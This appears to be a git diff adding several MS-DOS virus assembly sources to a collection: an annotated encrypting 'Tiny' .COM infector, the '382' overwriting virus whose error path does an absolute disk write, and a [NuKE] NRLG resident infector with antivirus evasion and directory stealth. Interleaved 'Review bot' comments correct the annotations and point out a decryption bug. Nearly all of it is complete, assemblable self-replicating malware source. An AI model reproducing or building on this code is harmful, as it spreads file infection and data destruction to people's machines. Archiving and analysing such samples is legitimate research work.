+ jnz loc_85 ; Jump if not zero + mov word ptr [si],720h + jmp short loc_87 ; (0CCB) +loc_85: ; xref 6FB8:0CA9 + mov ax,[bx+si] + mov ds:data_31e[bx+si],ax ; (5E5F:FF60=0FFFFh) + mov word ptr [bx+si],720h + sub word ptr cs:[980h][si],0A0h ; (6FB8:0980=0E8FBh) + mov byte ptr cs:[970h],0 ; (6FB8:0970=0Eh) + jmp short loc_88 ; (0CDE) +loc_86: ; xref 6FB8:0C95 + pop bx +loc_87: ; xref 6FB8:0CAF + mov bx,cs:data_54[si] ; (6FB8:0105=0CD09h) + add bx,0A0h + mov cs:data_54[si],bx ; (6FB8:0105=0CD09h) + mov word ptr cs:[980h][si],bx ; (6FB8:0980=0E8FBh) +loc_88: ; xref 6FB8:0C82, 0CC8 + inc si + inc si + cmp si,0A0h + jne loc_82 ; Jump if not equal + cmp byte ptr cs:[970h],0 ; (6FB8:0970=0Eh) + je loc_89 ; Jump if equal + push es + push di + push cx + push ds + pop es + push cs + pop ds + mov si,offset ds:[0CF5h] ; (6FB8:0CF5=0BEh) + xor di,di ; Zero register + mov cx,7D0h + rep movsw ; Rep when cx >0 Mov [si] to es:[di] + mov word ptr cs:[977h],0FFDCh ; (6FB8:0977=0C00Ah) + and byte ptr cs:[972h],4 ; (6FB8:0972=0BFh) + or byte ptr cs:[972h],88h ; (6FB8:0972=0BFh) + mov word ptr cs:[97Eh],0 ; (6FB8:097E=0EDE8h) + xor ax,ax ; Zero register + mov ds,ax + mov ax,word ptr cs:[973h] ; (6FB8:0973=984h) + mov ds:data_1e,ax ; (0000:0024=45h) + mov ax,word ptr cs:[975h] ; (6FB8:0975=0AAACh) + mov ds:data_2e,ax ; (0000:0026=3D1h) + pop cx + pop di + pop es +loc_89: ; xref 6FB8:0CEC + pop ds + pop si + pop bx + retn +sub_19 endp + + +; +; SUBROUTINE +; +; Called from: 6FB8:04D3, 04EC +; + +sub_20 proc near + cld ; Clear direction + pop ax + sub ax,si + add ax,di + push es + push ax + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + retf ; Return far +sub_20 endp + + db 90h, 50h,0E8h,0E2h, 03h, 8Bh + +seg_a ends + + + + end start + + CROSS REFERENCE - KEY ENTRY POINTS + + seg:off type label + ---- ---- ---- --------------- + 6FB8:0100 far start + + Interrupt Usage Synopsis + + Interrupt 21h : set default drive dl (0=a:) + Interrupt 21h : get default drive al (0=a:) + Interrupt 21h : 
set DTA to ds:dx + Interrupt 21h : get date, cx=year, dx=mon/day + Interrupt 21h : set current dir, path @ ds:dx + Interrupt 21h : open file, al=mode,name@ds:dx + Interrupt 21h : close file, bx=file handle + Interrupt 21h : read file, cx=bytes, to ds:dx + Interrupt 21h : write file cx=bytes, to ds:dx + Interrupt 21h : move file ptr, cx,dx=offset + Interrupt 21h : get/set file attrb, nam@ds:dx + Interrupt 21h : get present dir,drive dl,1=a: + Interrupt 21h : get/set file date & time + + I/O Port Usage Synopsis + + Port 20h : 8259-1 int command + diff --git a/MSDOS/Virus.MSDOS.Unknown.334.asm b/MSDOS/Virus.MSDOS.Unknown.334.asm new file mode 100644 index 00000000..62648043 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.334.asm 
@@ -0,0 +1,252 @@
+
+muttiny segment byte public
+ assume cs:muttiny, ds:muttiny
+
+ org 100h
+
+start: db 0e9h, 5, 0 ; jmp startvir
+restorehere: int 20h
+idword: dw 990h
+; The next line is incredibly pointless. It is a holdover from one
+; of the original TINYs, where the id was 7, 8, 9. The author can
+; easily save one byte merely by deleting this line.
+ db 09h
+startvir:
+ call oldtrick ; Standard location-finder
+oldtrick: pop si
+; The following statement is a bug -- well, not really a bug, just
+; extraneous code. The value pushed on the stack in the following
+; line is NEVER popped off. This is messy programming, as one byte
+; could be saved by removing the statement.
+ push si
+ sub si,offset oldtrick
+ call encrypt ; Decrypt virus
+ call savepsp ; and save the PSP
+; NOTE: The entire savepsp/restorepsp procedures are unnecessary.
+; See the procedures at the end for further details.
+ jmp short findencryptval ; Go to the rest of the virus
+; The next line is another example of messy programming -- it is a
+; NOP inserted by MASM during assembly. Running this file through
+; TASM with the /m2 switch should eliminate such "fix-ups."
+ nop
+; The next line leaves me guessing as to the author's true intent.
+ db 0
+
+encryptval dw 0h
+
+encrypt:
+ push bx ; Save handle
+; The following two lines of code could be condensed into one:
+; lea bx, [si+offset startencrypt]
+; Once again, poor programming style, though there's nothing wrong
+; with the code.
+ mov bx,offset startencrypt
+ add bx,si
+; Continueencrypt is implemented as a jmp-type loop. Although it's
+; fine to code it this way, it's probably easier to code using the
+; loop statement. Upon close inspection, one finds the loop to be
+; flawed. Note the single inc bx statement. This essentially makes
+; the encryption value a a byte instead of a word, which decreases
+; the number of mutations from 65,535 to 255. Once again, this is
+; just poor programming, very easily rectified with another inc bx
+; statement. Another optimization could be made. Use a
+; mov dx, [si+encryptval]
+; to load up the encryption value before the loop, and replace the
+; three lines following continueencrypt with a simple:
+; xor word ptr [bx], dx
+continueencrypt:
+ mov ax,[bx]
+ xor ax,word ptr [si+encryptval]
+ mov [bx],ax
+ inc bx
+; The next two lines should be executed BEFORE continueencrypt. As
+; it stands right now, they are recalculated every iteration which
+; slows down execution somewhat. Furthermore, the value calculated
+; is much too large and this increases execution time. Yet another
+; improvement would be the merging of the mov/add pair to the much
+; cleaner lea cx, [si+offset endvirus].
+ mov cx,offset veryend ; Calculate end of
+ add cx,si ; encryption: Note
+ cmp bx,cx ; the value is 246
+ jle continueencrypt ; bytes too large.
+ pop bx
+ ret
+writerest: ; Tack on the virus to the
+ call encrypt ; end of the file.
+ mov ah,40h
+ mov cx,offset endvirus - offset idword
+ lea dx,[si+offset idword] ; Write starting from the id
+ int 21h ; word
+ call encrypt
+ ret
+
+startencrypt:
+; This is where the encrypted area begins. This could be moved to
+; where the ret is in procedure writerest, but it is not necessary
+; since it won't affect the "scannability" of the virus.
+
+findencryptval:
+ mov ah,2Ch ; Get random #
+ int 21h ; CX=hr/min dx=sec
+; The following chunk of code puzzles me. I admit it, I am totally
+; lost as to its purpose.
+ cmp word ptr [si+offset encryptval],0
+ je step_two
+ cmp word ptr [si+offset encryptval+1],0
+ je step_two
+ cmp dh,0Fh
+ jle foundencryptionvalue
+step_two: ; Check to see if any
+ cmp dl,0 ; part of the encryption
+ je findencryptval ; value is 0 and if so,
+ cmp dh,0 ; find another value.
+ je findencryptval
+ mov [si+offset encryptval],dx
+foundencryptionvalue:
+ mov bp,[si+offset oldjmp] ; Set up bp for
+ add bp,103h ; jmp later
+ lea dx,[si+filemask] ; '*.COM',0
+ xor cx,cx ; Attributes
+ mov ah,4Eh ; Find first
+tryanother:
+ int 21h
+ jc quit_virus ; If none found, exit
+
+ mov ax,3D02h ; Open read/write
+ mov dx,9Eh ; In default DTA
+ int 21h
+
+ mov cx,3
+ mov bx,ax ; Swap file handle register
+ lea dx,[si+offset buffer]
+ mov di,dx
+ call read ; Read 3 bytes
+ cmp byte ptr [di],0E9h ; Is it a jmp?
+ je infect
+findnext:
+ mov ah,4Fh ; If not, find next
+ jmp short tryanother
+infect:
+ mov ax,4200h ; Move file pointer
+ mov dx,[di+1] ; to jmp location
+ mov [si+offset oldjmp],dx ; and save old jmp
+ xor cx,cx ; location
+ call int21h
+ jmp short skipcheckinf
+; Once again, we meet an infamous MASM-NOP.
+ nop
+; I don't understand why checkinf is implemented as a procedure as
+; it is executed but once. It is a waste of code space to do such
+; a thing. The ret and call are both extra, wasting four bytes. An
+; additional three bytes were wasted on the JMP skipping checkinf.
+; In a program called "Tiny," a wasted seven bytes is rather large
+; and should not exist. I have written a virus of half the length
+; of this virus which is a generic COM infector. There is just too
+; too much waste in this program.
+checkinf:
+ cmp word ptr [di],990h ; Is it already
+ je findnext ; infected?
+; The je statement above presents another problem. It leaves stuff
+; on the stack from the call. This is, once again, not a critical
+; error but nevertheless it is extremely sloppy behavior.
+ xor dx,dx
+ xor cx,cx
+ mov ax,4202h
+ call int21h ; Goto end of file
+ ret
+skipcheckinf:
+ mov cx,2
+ mov dx,di
+ call read ; read 2 bytes
+ call checkinf
+; The next check is extraneous. No COM file is larger than 65,535
+; bytes before infection simply because it is "illegal." Yet ano-
+; ther waste of code. Even if one were to use this useless check,
+; it should be implemented, to save space, as or dx, dx.
+ cmp dx,0 ; Check if too big
+ jne findnext
+
+ cmp ah,0FEh ; Check again if too big
+ jae findnext
+ mov [si+storejmp],ax ; Save new jmp
+ call writerest ; location
+ mov ax,4200h ; Go to offset
+ mov dx,1 ; 1 in the file
+ xor cx,cx
+ call int21h
+
+ mov ah,40h ; and write the new
+ mov cx,2 ; jmp location
+ lea dx,[si+storejmp]
+ call int21h
+; I think it is quite obvious that the next line is pointless. It
+; is a truly moronic waste of two bytes.
+ jc closefile
+closefile:
+ mov ah,3Eh ; Close the file
+ call int21h
+quit_virus:
+ call restorepsp
+ jmp bp
+
+read:
+ mov ah,3Fh ; Read file
+; I do not understand why all the int 21h calls are done with this
+; procedure. It is a waste of space. A normal int 21h call is two
+; bytes long while it's three bytes just to call this procedure!
+int21h:
+ int 21h
+ ret
+
+ db 'Made in England'
+
+; Note: The comments for savepsp also apply to restorepsp.
+
+; This code could have easily been changed to a set active DTA INT
+; 21h call (AH = 1Ah). It would have saved many, many bytes.
+
+savepsp:
+ mov di,0
+; The following is a bug. It should be
+; mov cx, 50h
+; since the author decided to use words instead of bytes.
+ mov cx,100h
+ push si
+; The loop below is dumb. A simple rep movsw statement would have
+; sufficed. Instead, countless bytes are wasted on the loop.
+storebytes:
+ mov ax,[di]
+ mov word ptr [si+pspstore],ax
+ add si,2
+ add di,2
+ loop storebytes
+ pop si
+ ret
+
+restorepsp:
+ mov di,0
+ mov cx,100h ; Restore 200h bytes
+ push si
+restorebytes:
+ mov ax,word ptr [si+pspstore]
+ mov [di],ax
+ add si,2
+ add di,2
+ loop restorebytes
+ pop si
+ ret
+
+oldjmp dw 0
+filemask db '*.COM',0
+idontknow1 db 66h ; Waste of one byte
+buffer db 00h, 00h, 01h ; Waste of three bytes
+storejmp dw 0 ; Waste of two bytes
+; endvirus should be before idontknow1, thereby saving six bytes.
+endvirus:
+idontknow2 db ?, ?
+pspstore db 200 dup (?) ; Should actually be
+idontknow3 db 2ch dup (?) ; 100h bytes long.
+veryend: ; End of encryption
+muttiny ends
+ end start
+
diff --git a/MSDOS/Virus.MSDOS.Unknown.382.asm b/MSDOS/Virus.MSDOS.Unknown.382.asm
new file mode 100644
index 00000000..a1ebb8e0
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.382.asm
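Review bot: The decrypt loop under `continueencrypt` terminates with `cmp bx,cx` / `jle continueencrypt`, a signed comparison on two code-segment offsets; because the `cmp ah,0FEh` size check admits hosts of almost 64 KB, a host whose size places `startencrypt` below offset 8000h and `veryend` at or above it can make cx read as negative, so the loop exits after one word and the rest of the body runs still encrypted — the annotator flags the 246-byte overrun on these lines but not this, and `jbe continueencrypt` is the unsigned form. The listing also carries no provenance or behaviour header, unlike the 382 file added in the same commit, so I would add one above `muttiny segment` stating that this is a self-replicating, self-encrypting infector of `*.COM` files in the current directory (FindFirst/FindNext, hosts beginning with `E9h` only), that an infected host is recognised by the word `990h` at the file offset named by its entry jmp (the `checkinf` test), that the XOR key is taken from the DOS time call (`ah=2Ch`) so each generation differs, and that the source assembles as-is and must only be built or run inside an isolated DOS VM. The inline critique (for example the `mov cx,100h` / 200-byte `pspstore` overrun) is the original annotator's voice and is not verified here; the header should say so.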
@@ -0,0 +1,243 @@ +>>> Article From Evolution #2 - YAM '92 + +Article Title: 382 Virus +Author: Admiral Bailey + + +;=--- +; +; 382 Virus (Family-Q as McAfee 91 calls it) +; +; Disassembled By Admiral Bailey [YAM '92] +; June 25, 1992 +; +; The writer of this is unknown to me... maybe you should put some of +; your info in it. +; +; Notes:This virus I found on a board and got right to it. It wasnt +; too hard to disassemble since there was no encryption. Its an +; .com over writing virus. Yes there is ????????exe inside the +; file but I don't know what the hell that is. If you run it it +; only overwrits the com files. It probably get exe files if no +; com files are found. But anyways there seems to be a bug in +; the original virus. Put it in a directory and run it it will +; display crap and crash the computer. With out doing any +; damage. If you want any more info check it out for yourself. +; All i did this time was comment it.. cuz i found this to be a +; boring run of the mill virus. Anyways here it is. +; +;=--------- + +PAGE 59,132 ; I gotta check out + ; what this means... + +data_1e equ 9Eh +data_15e equ 0E000h +data_17e equ 0E17Eh + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + org 100h + +382 proc far + +start: + jmp short $+2 ; just there to confuse + mov cs:data_4,0 ; actually jumps to here + mov ah,19h ; get default drive + int 21h + mov cs:data_11,al ; save default drive + mov ah,47h ; get present dir of + mov dl,0 ; current drive + lea si,data_13 ; holds directory name + int 21h + clc +loc_1: + jnc loc_2 ; if no error then jump + mov ah,17h ; rename file + lea dx,data_7 ; Load effective addr + int 21h + cmp al,0FFh ; is there an error? 
+ jne loc_2 ; no then jump + mov ah,2Ch ; get current time + int 21h + + mov al,cs:data_11 ; drive + mov bx,dx ; buffer + mov cx,2 ; # of sectors + mov dh,0 ; parm block + int 26h ; Absolute disk write + jmp loc_9 + +loc_2: + mov ah,3Bh ; set the current + lea dx,data_10 ; directory + int 21h + + jmp short loc_6 +loc_3: + mov ah,17h ; rename file + lea dx,data_7 + int 21h + + mov ah,3Bh ; set current directory + lea dx,data_10 + int 21h + + mov ah,4Eh ; find first file + mov cx,11h + lea dx,data_6 ; file type + int 21h + + jc loc_1 ; Jump if carry Set + mov bx,cs:data_4 ; put value in bx + inc bx ; check to see if it is + dec bx ; zero + jz loc_5 +loc_4: + mov ah,4Fh ; find next file + int 21h + + jc loc_1 ; none found then jump + dec bx + jnz loc_4 ; Jump if not zero +loc_5: + mov ah,2Fh ; get dta + int 21h + + add bx,1Ch + mov word ptr es:[bx],5C20h + inc bx + push ds ; save ds + mov ax,es ; putting es into ds + mov ds,ax + mov dx,bx + mov ah,3Bh ; get current dir + int 21h + + pop ds ; get old ds + mov bx,cs:data_4 + inc bx + mov cs:data_4,bx +loc_6: + mov ah,4Eh ; find first file + mov cx,1 + lea dx,data_5 ; type to find + int 21h + + jc loc_3 ; none found then jump + jmp short loc_8 +loc_7: + mov ah,4Fh ; find next file + int 21h + + jc loc_3 ; none found then jump +loc_8: + mov ah,3Dh ; open file + mov al,0 + mov dx,data_1e + int 21h + + mov bx,ax ; file name in bx + mov ah,3Fh ; read file + mov cx,17Eh ; number of bytes + nop + mov dx,data_15e ; buffer to hold the + nop ; bytes + int 21h + + mov ah,3Eh ; close the file + int 21h + + mov bx,cs:data_15e + cmp bx,0EBh + je loc_7 + mov ah,43h ; get attrib + mov al,0 + mov dx,data_1e ; filename + int 21h + + mov ah,43h ; set attrib + mov al,1 + and cx,0FEh + int 21h + + mov ah,3Dh ; open up the file + mov al,2 + mov dx,data_1e ; filename + int 21h + + mov bx,ax ; filename + mov ah,57h ; get files date and + mov al,0 ; time + int 21h + + push cx ; save time + push dx + mov dx,word ptr cs:[23Ch] + mov 
cs:data_17e,dx + mov dx,word ptr cs:data_15e+1 + lea cx,cs:[13Bh] + sub dx,cx + mov word ptr cs:[23Ch],dx + mov ah,40h ; write to file + mov cx,17Eh ; size of virus [382] + nop + lea dx,ds:[100h] ; Load effective addr + int 21h + + mov ah,57h ; set files time+date + mov al,1 + pop dx ; get old date+time + pop cx + int 21h + + mov ah,3Eh ; close up the file + int 21h + + mov dx,cs:data_17e + mov word ptr cs:[23Ch],dx +loc_9: + call sub_1 + jmp $-3618h + db 0B4h, 4Ch,0CDh, 21h ; bytes to quit + ; mov ax,4c00h + ; int 21 + +382 endp + +sub_1 proc near + mov ah,3Bh ; set current dir + lea dx,data_12 ; holds current + int 21h ; directory + retn +sub_1 endp + +data_4 dw 0 +data_5 db 2Ah + db 2Eh, 63h, 6Fh, 6Dh, 00h +data_6 db 2Ah + db 0 +data_7 db 0FFh + db 00h, 00h, 00h, 00h, 00h, 3Fh + db 00h + db 3Fh + db 7 dup (3Fh) + db 65h, 78h, 65h, 00h, 00h, 00h + db 00h, 00h + db 3Fh + db 7 dup (3Fh) + db 63h, 6Fh, 6Dh, 00h +data_10 db 5Ch + db 0 +data_11 db 4 +data_12 db 5Ch +data_13 db 0 + +seg_a ends + + + + end start + + diff --git a/MSDOS/Virus.MSDOS.Unknown.386sx16.asm b/MSDOS/Virus.MSDOS.Unknown.386sx16.asm new file mode 100644 index 00000000..0dc1e608 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.386sx16.asm 
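Review bot: The comment on `mov ah,3Bh ; get current dir` at loc_5 is wrong — AH=3Bh is the DOS change-directory call, exactly as this hunk's own loc_2 and sub_1 comments say, and DS:DX here points at the `\`-prefixed name just patched into the DTA, so `; chdir into the subdirectory just found` is what the line does. The two `mov bx,ax ; file name in bx` / `mov bx,ax ; filename` lines following the AH=3Dh opens move the returned handle, not a name; `; bx = file handle` is the reading a maintainer needs. The header's "With out doing any damage" should also be qualified: the error path at loc_1 issues an INT 26h absolute write of two sectors to the saved default drive at a sector number taken from the INT 21h/2Ch time result, which is destructive to the volume's low sectors and is the behaviour an analyst should record for this sample.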
@@ -0,0 +1,454 @@ +;Ŀ +; THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. [NuKE] PoWeR +; CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN [NuKE] WaReZ +; auToR: aLL [NuKE] MeMeBeRS [NuKE] PoWeR +; [NuKE] THe ReaL PoWeR! [NuKE] WaReZ +; NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 [NuKE] PoWeR +; + +.286 +code segment +assume cs:code,ds:code +org 100h + +start: CALL NEXT + +NEXT: + mov di,sp ;take the stack pointer location + mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus + sub bp,offset next ;subtract the large code off this code + ; +;******************************************************************* +; #1 DECRYPT ROUTINE +;******************************************************************* + +cmp byte ptr cs:[crypt],0b9h ;is the first runnig? +je crypt2 ;yes! not decrypt +;---------------------------------------------------------- +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt]+ bp ;di = first byte to decrypt +mov dx,1 ;dx = value for decrypt +;---------------------------------------------------------- +deci: ;deci = fuck label! +;---------------------------------------------------------- + +inc word ptr [di] +not byte ptr [di] +sub word ptr [di],0bb4h +xor byte ptr [di],049h +xor word ptr [di],0e373h +sub word ptr [di],0ec3h +add word ptr [di],0e273h +add byte ptr [di],01h +inc word ptr [di] +xor byte ptr [di],02ah +xor word ptr [di],07ab0h +not word ptr [di] +xor byte ptr [di],071h +not byte ptr [di] +xor word ptr [di],0294ah +xor byte ptr [di],0ebh +inc di +inc di +;---------------------------------------------------------- +jmp bye ;######## BYE BYE F-PROT ! ########## +mov ah,4ch +int 21h +bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!### +;----------------------------------------------------------- +mov ah,0bh ;######### BYE BYE TBAV ! ########## +int 21h ;### (CANGE INT AT YOU PLEASURE) ### +;---------------------------------------------------------- +loop deci ;repeat please! 
+ ; +;***************************************************************** +; #2 DECRYPT ROUTINE +;***************************************************************** + ; +crypt: ;fuck label! + ; +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt2] + bp ;di = first byte to decrypt +;--------------------------------------------------------------- +deci2: ; +xor byte ptr cs:[di],1 ;decrytion rutine +inc di ;very simple... +loop deci2 ; +;--------------------------------------------------------------- +crypt2: ;fuck label! + ; +MOV AX,0CACAH ;call to my resident interrup mask +INT 21H ;for chek "I'm is residet?" +CMP Bh,0CAH ;is equal to CACA? +JE PUM2 ;yes! jump to runnig program +call action +;***************************************************************** +; NRLG FUNCTIONS (SELECTABLE) +;***************************************************************** + +call ANTI_V +;**************************************************************** +; PROCESS TO REMAIN RESIDENT +;**************************************************************** + +mov ax,3521h +int 21h ;store the int 21 vectors +mov word ptr [bp+int21],bx ;in cs:int21 +mov word ptr [bp+int21+2],es ; +;--------------------------------------------------------------- +push cs ; +pop ax ;ax = my actual segment +dec ax ;dec my segment for look my MCB +mov es,ax ; +mov bx,es:[3] ;read the #3 byte of my MCB =total used memory +;--------------------------------------------------------------- +push cs ; +pop es ; +sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus +sub bx,17 + offset fin ;and 100H for the PSP total +mov ah,4ah ;used memory +int 21h ;put the new value to MCB +;--------------------------------------------------------------- +mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin +mov ah,48h ; +int 21h ;request the memory to fuck DOS! 
+;--------------------------------------------------------------- +dec ax ;ax=new segment +mov es,ax ;ax-1= new segment MCB +mov byte ptr es:[1],8 ;put '8' in the segment +;-------------------------------------------------------------- +inc ax ; +mov es,ax ;es = new segment +lea si,[bp + offset start] ;si = start of virus +mov di,100h ;di = 100H (psp position) +mov cx,offset fin - start ;cx = lag of virus +push cs ; +pop ds ;ds = cs +cld ;mov the code +rep movsb ;ds:si >> es:di +;-------------------------------------------------------------- +mov dx,offset virus ;dx = new int21 handler +mov ax,2521h ; +push es ; +pop ds ; +int 21h ;set the vectors +;------------------------------------------------------------- +pum2: ; + ; +mov ah,byte ptr [cs:bp + real] ;restore the 3 +mov byte ptr cs:[100h],ah ;first bytes +mov ax,word ptr [cs:bp + real + 1] ; +mov word ptr cs:[101h],ax ; +;------------------------------------------------------------- +mov ax,100h ; +jmp ax ;jmp to execute + ; +;***************************************************************** +;* HANDLER FOR THE INT 21H +;***************************************************************** + ; +VIRUS: ; + ; +cmp ah,4bh ;is a 4b function? +je REPRODUCCION ;yes! jump to reproduce ! +cmp ah,11h +je dir +cmp ah,12h +je dir +dirsal: +cmp AX,0CACAH ;is ... a caca function? (resident chek) +jne a3 ;no! jump to a3 +mov bh,0cah ;yes! put ca in bh +a3: ; +JMP dword ptr CS:[INT21] ;jmp to original int 21h +ret ; +make db '[NuKE] N.R.L.G. 
AZRAEL' +dir: +jmp dir_s +;------------------------------------------------------------- +REPRODUCCION: ; + ; +pushf ;put the register +pusha ;in the stack +push si ; +push di ; +push bp ; +push es ; +push ds ; +;------------------------------------------------------------- +push cs ; +pop ds ; +mov ax,3524H ;get the dos error control +int 21h ;interupt +mov word ptr error,es ;and put in cs:error +mov word ptr error+2,bx ; +mov ax,2524H ;change the dos error control +mov dx,offset all ;for my "trap mask" +int 21h ; +;------------------------------------------------------------- +pop ds ; +pop es ;restore the registers +pop bp ; +pop di ; +pop si ; +popa ; +popf ; +;------------------------------------------------------------- +pushf ;put the registers +pusha ; +push si ;HEY! AZRAEL IS CRAZY? +push di ;PUSH, POP, PUSH, POP +push bp ;PLEEEEEAAAAAASEEEEEEEEE +push es ;PURIFY THIS SHIT! +push ds ; +;------------------------------------------------------------- +mov ax,4300h ; +int 21h ;get the file +mov word ptr cs:[attrib],cx ;atributes +;------------------------------------------------------------- +mov ax,4301h ;le saco los atributos al +xor cx,cx ;file +int 21h ; +;------------------------------------------------------------- +mov ax,3d02h ;open the file +int 21h ;for read/write +mov bx,ax ;bx=handle +;------------------------------------------------------------- +mov ax,5700h ; +int 21h ;get the file date +mov word ptr cs:[hora],cx ;put the hour +mov word ptr cs:[dia],dx ;put the day +and cx,word ptr cs:[fecha] ;calculate the seconds +cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX) +jne seguir ;yes! the file is infected! 
+jmp cerrar ; +;------------------------------------------------------------ +seguir: ; +mov ax,4202h ;move the pointer to end +call movedor ;of the file +;------------------------------------------------------------ +push cs ; +pop ds ; +sub ax,3 ;calculate the +mov word ptr [cs:largo],ax ;jmp long +;------------------------------------------------------------- +mov ax,04200h ;move the pointer to +call movedor ;start of file +;---------------------------------------------------------- +push cs ; +pop ds ;read the 3 first bytes +mov ah,3fh ; +mov cx,3 ; +lea dx,[cs:real] ;put the bytes in cs:[real] +int 21h ; +;---------------------------------------------------------- +cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ? +jne er1 ;yes! is a EXE... fuckkk! +;---------------------------------------------------------- +jmp cerrar +er1: +;---------------------------------------------------------- +mov ax,4200h ;move the pointer +call movedor ;to start fo file +;---------------------------------------------------------- +push cs ; +pop ds ; +mov ah,40h ; +mov cx,1 ;write the JMP +lea dx,[cs:jump] ;instruccion in the +int 21h ;fist byte of the file +;---------------------------------------------------------- +mov ah,40h ;write the value of jmp +mov cx,2 ;in the file +lea dx,[cs:largo] ; +int 21h ; +;---------------------------------------------------------- +mov ax,04202h ;move the pointer to +call movedor ;end of file +;---------------------------------------------------------- +push cs ; +pop ds ;move the code +push cs ;of my virus +pop es ;to cs:end+50 +cld ;for encrypt +mov si,100h ; +mov di,offset fin + 50 ; +mov cx,offset fin - 100h ; +rep movsb ; +;---------------------------------------------------------- +mov cx,offset fin +mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus +enc: ; +xor byte ptr cs:[di],1 ;encrypt the virus +inc di ;code +loop enc ; +;--------------------------------------------------------- +mov cx,offset fin +mov di,offset 
fin + 50 + (offset crypt - offset start) ;virus +mov dx,1 +enc2: ; + +xor byte ptr [di],0ebh +xor word ptr [di],0294ah +not byte ptr [di] +xor byte ptr [di],071h +not word ptr [di] +xor word ptr [di],07ab0h +xor byte ptr [di],02ah +dec word ptr [di] +sub byte ptr [di],01h +sub word ptr [di],0e273h +add word ptr [di],0ec3h +xor word ptr [di],0e373h +xor byte ptr [di],049h +add word ptr [di],0bb4h +not byte ptr [di] +dec word ptr [di] +inc di +inc di ;the virus code +loop enc2 ; +;-------------------------------------------- +mov ah,40h ; +mov cx,offset fin - offset start ;copy the virus +mov dx,offset fin + 50 ;to end of file +int 21h ; +;---------------------------------------------------------- +cerrar: ; + ;restore the +mov ax,5701h ;date and time +mov cx,word ptr cs:[hora] ;file +mov dx,word ptr cs:[dia] ; +or cx,word ptr cs:[fecha] ;and mark the seconds +int 21h ; +;---------------------------------------------------------- +mov ah,3eh ; +int 21h ;close the file +;---------------------------------------------------------- +pop ds ; +pop es ;restore the +pop bp ;registers +pop di ; +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +pusha ; + ; +mov ax,4301h ;restores the atributes +mov cx,word ptr cs:[attrib] ;of the file +int 21h ; + ; +popa ; +;---------------------------------------------------------- +pushf ; +pusha ; 8-( = f-prot +push si ; +push di ; 8-( = tbav +push bp ; +push es ; 8-) = I'm +push ds ; +;---------------------------------------------------------- +mov ax,2524H ; +lea bx,error ;restore the +mov ds,bx ;errors handler +lea bx,error+2 ; +int 21h ; +;---------------------------------------------------------- +pop ds ; +pop es ; +pop bp ;restore the +pop di ;resgisters +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +JMP A3 ;jmp to orig. 
INT 21 + ; +;********************************************************** +; SUBRUTINES AREA +;********************************************************** + ; +movedor: ; + ; +xor cx,cx ;use to move file pointer +xor dx,dx ; +int 21h ; +ret ; +;---------------------------------------------------------- +all: ; + ; +XOR AL,AL ;use to set +iret ;error flag + +;*********************************************************** +; DATA AREA +;*********************************************************** +largo dw ? +jump db 0e9h +real db 0cdh,20h,0 +hora dw ? +dia dw ? +attrib dw ? +int21 dd ? +error dd ? + +;------------------------ +action: ;Nothing Action! +NOP ;only replicate +ret ;Return to call +;------------------------ + +;--------------------------------- +ANTI_V: ; +MOV AX,0FA01H ;REMOVE VSAFE FROM MEMORY +MOV DX,5945H ; +INT 21H ; +ret ; +;--------------------------------- + +;***************************************************** +dir_s: + pushf + push cs + call a3 ;Get file Stats + test al,al ;Good FCB? + jnz no_good ;nope + push ax + push bx + push es + mov ah,51h ;Is this Undocmented? huh... + int 21h + mov es,bx + cmp bx,es:[16h] + jnz not_infected + mov bx,dx + mov al,[bx] + push ax + mov ah,2fh ;Get file DTA + int 21h + pop ax + inc al + jnz fcb_okay + add bx,7h +fcb_okay: mov ax,es:[bx+17h] + and ax,1fh ;UnMask Seconds Field + xor al,byte ptr cs:fechad + jnz not_infected + and byte ptr es:[bx+17h],0e0h + sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size + sbb es:[bx+1fh],ax +not_infected:pop es + pop bx + pop ax +no_good: iret +;******************************************************************** +; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX +;********************************************************************* + +action_dia Db 014H ;day for the action +action_mes Db 02H ;month for the action +FECHA DW 01eH ;Secon for mark +FECHAd Db 01eH ;Secon for mark dir st +fin: +code ends +end start 
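Review bot: The branch comments in the infection check are inverted: `jne seguir ;yes! the file is infected!` is taken when the seconds-field marker does not match, i.e. the file is still clean, and the fall-through `jmp cerrar` is the already-infected case; likewise `jne er1 ;yes! is a EXE...` is taken when the first word is not 'MZ', so the EXE case is the fall-through. `;is ecual to 58?` also disagrees with `FECHA DW 01eH`: the dir_s routine's own `and ax,1fh ;UnMask Seconds Field` shows the marker lives in the low five bits, which DOS stores as seconds/2, so 1Eh encodes a 60-second timestamp — an out-of-range value that a scanner or file-system audit can flag. Suggested wording: `jne seguir ; marker absent: not yet infected` and `jne er1 ; not 'MZ': not an EXE`.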
diff --git a/MSDOS/Virus.MSDOS.Unknown.3apa3a.asm b/MSDOS/Virus.MSDOS.Unknown.3apa3a.asm new file mode 100644 index 00000000..b2269b32 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.3apa3a.asm 
